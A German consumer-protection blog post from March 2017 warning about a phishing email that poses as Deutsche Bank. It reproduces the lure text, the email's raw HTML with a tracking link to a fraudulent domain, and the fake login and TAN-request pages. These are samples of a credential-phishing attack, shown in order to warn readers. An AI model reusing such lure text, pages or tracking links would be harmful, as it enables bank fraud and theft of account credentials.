Sicherheit fьr Konto DE(IBAN) von Deutsche Bank Privat und Gesch?ftskunden ([email protected])

Am Donnerstag, den 30. März 2017 wurde folgende E-Mail durch unbekannte Dritte die folgende E-Mail in deutscher Sprache versendet. Achtung: Es handelt sich um eine gefälschte E-Mail! Klicken Sie nicht auf den Link und geben Sie keine Daten ein!

Aufgrund des Betreff besteht vermutlich ein direkter Zusammenhang mit der Phishing-Welle „Steuerrückerstattung von Bundeszentralamt für Steuern„, da als Empfänger bzw. Betreff die damals angegebene IBAN verwendet wurde. Daher kann die gleiche Phishing-Mail auch für andere Banken nicht ausgeschlossen werden.

Betreff: Sicherheit fьr Konto DExxxxxxxxxxxxxxxxxxxx
Absender: Deutsche Bank Privat und Gesch?ftskunden ([email protected])

Deutsche Bank
OnlineBanking & Brokerage

Sehr geehrte Kundin, sehr geehrter Kunde,

Während einer Untersuchung haben wir ein Problem an Ihrem Konto entdeckt. Für Ihre Sicherheit wurde Ihr Konto als inaktiv markiert. Auf dieser Seite haben Sie die Möglichkeit, Ihr Konto wieder freizugeben.

Login ausführen & Konto freizugeben ->

Deutsche Bank Privat- und Geschäftskunden AG

Wie auch schon bei der Phishing-Welle „Steuerrückerstattung von Bundeszentralamt für Steuern“ ist die betrügerische Domain nicht immer erreichbar, weswegen die E-Mail auch so aussehen könnte:

Achtung: Es handelt sich um eine gefälschte E-Mail! Die E-Mail stammt nicht von der Deutschen Bank! Das Unternehmen hat nichts mit der E-Mail zu tun! Klicken Sie deswegen nicht auf die Links und geben Sie keine Daten ein!

Die Deutsche Bank hat eine Seite, in der Sie auch eine Telefon-Nr. für Meldungen finden. Senden Sie Phishing-Mails bezüglich der Deutschen Bank an [email protected].

Da aufgrund der IBAN im Betreff sowie im Empfängerfeld die Informationen aus der Phishing-Welle „Steuerrückerstattung von Bundeszentralamt für Steuern“ stammen, kann die Darstellung anderer Banken nicht ausgeschlossen werden!

Die betrügerische E-Mail besteht eigentlich nur aus einem Bild, welches verlinkt ist:

<html><head><meta http-equiv=“content-type“ content=“text/html; charset=UTF-8″ />
<meta http-equiv=“content-language“ content=“de“ />
</head>
<body>

<p><a href=“http://bringhtor.tawnwitram.civilizationdesign.org/0uQpha/nIhbx.html?e=(E-Mail-Adresse)“>
<img id=“img“ src=“http://bringhtor.tawnwitram.civilizationdesign.org/0uQpha/bFPWn.png?e=(E-Mail-Adresse)“></a></p>
<div style=“visibility:hidden“>
Wichtige Informationen
/div>
</body>
</html>

Sowohl beim Aufruf des Bildes, wie auch beim Aufruf der betrügerischen Adresse wird die E-Mail-Adresse bereits übermittelt. Betrüger können somit überprüfen, ob die E-Mail gelesen wurde und ob die E-Mail-Adresse gültig ist. Öffnen Sie daher nicht die E-Mail!

Weder die verlinkte Domain bringhtor.tawnwitram.civilizationdesign.org, noch die weitergeleitete Domain warten.genehmigung.bayipazar.com gehören zur Deutschen Bank! Klicken Sie deswegen nicht auf den Link und geben Sie keine Daten ein!

Eine gefälschte Seite würde Sie zum Login der Deutschen Bank auffordern. Geben Sie keine Daten ein! Alle Eingaben werden an unbekannte Dritte übermittelt und können anschließend missbraucht werden!

Deutsche Bank

OnlineBanking & Brokerage

Sprachauswahl und Filialsuche
– English Version
– Ihre Filiale

OnlineBanking
Erledigen Sie Ihre täglichen Bankgeschäfte flexibel und bequem mit unserem OnlineBanking.
– Rund ums Online-Banking
– Demokonto testen
– Konto eröffnen
– Konto für Online- und Telefon-Banking freischalten
– MobileBanking

Hilfe
– Häufig gestellte Fragen
– Download-Center
– Nutzeranleitung
– Technischer Support
– Sicherheit

Sie sind hier: Kunden-Login
Herzlich willkommen!

Filiale (3-stellig)
Konto (7-stellig)
Unterkonto (2-stellig)
PIN (5-stellig)

Direkt zu …
Session-TAN für Wertpapieraufträge verwenden

Bitte beachten Sie: Die Deutsche Bank fordert pro
Auftrag nie mehrere Transaktionsnummern (TAN)!

Login ausführen

Nach dem angeblichen Login dauert es kurz…

… bevor über eine angebliche Sicherheitsüberprüfung berichtet wird:

Sicherheitsverfahren

Als Teil unserer Sicherheitsmaßnahmen untersuchen wir die Aktivität in dem Deutsche Bank System regelmäßig.
Während einer solchen Untersuchung haben wir ein Problem an Ihrem Konto entdeckt.

Für die Sicherheit unserer Kunden hat Deutsche Bank eine neue Sicherheitsmaßnahme eingeführt:
– Periodisch muß jeder unserer Kunden beweisen daß sein TAN-Block sich noch in seinem Besitz befindet.
Sie habe Ihren TAN-Block bereit.

weiter ->

Bitte beachten Sie: Die Deutsche Bank fordert pro Auftrag nie mehrere Transaktionsnummern (TAN)!

Klicken Sie nicht auf „Weiter“! Es handelt sich um betrügerische Seiten! Während des Tests wurde die betrügerische Seite gelöscht, so dass die nächste Meldung nur noch ein „Not Found“ war. Da in der Phishing-Welle „Steuerrückerstattung von Bundeszentralamt für Steuern“ die Seiten aber auch später wieder zur Verfügung standen, kann nicht ausgeschlossen werden, dass die Seiten später wieder erreichbar sind. Geben Sie daher keine Daten ein!

Not Found

Kommentar(e)

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.